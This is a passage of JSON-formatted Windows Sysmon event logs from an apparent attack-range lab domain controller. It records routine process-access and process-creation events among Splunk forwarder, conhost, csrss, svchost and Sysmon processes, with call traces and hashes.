C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.829","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-0010D17B0500}","TargetProcessId":"4860","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3490,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.064\r\nSourceProcessGUID: {41C8662E-1FF5-5F25-0000-0010D17B0500}\r\nSourceProcessId: 4860\r\nSourceThreadId: 4364\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.064","SourceProcessGUID":"{41C8662E-1FF5-5F25-0000-0010D17B0500}","SourceProcessId":"4860","SourceThreadId":"4364","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3491,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.114\r\nProcessGuid: {41C8662E-1FF6-5F25-0000-00105D7F0500}\r\nProcessId: 4880\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nParentProcessId: 2364\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.114","ProcessGuid":"{41C8662E-1FF6-5F25-0000-00105D7F0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010596B0500}","ParentProcessId":"2364","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3492,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nSourceProcessId: 2364\r\nSourceThreadId: 2176\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-00105D7F0500}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010596B0500}","SourceProcessId":"2364","SourceThreadId":"2176","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-00105D7F0500}","TargetProcessId":"4880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3493,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-00105D7F0500}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-00105D7F0500}","TargetProcessId":"4880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3494,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3495,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3496,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3497,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3498,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 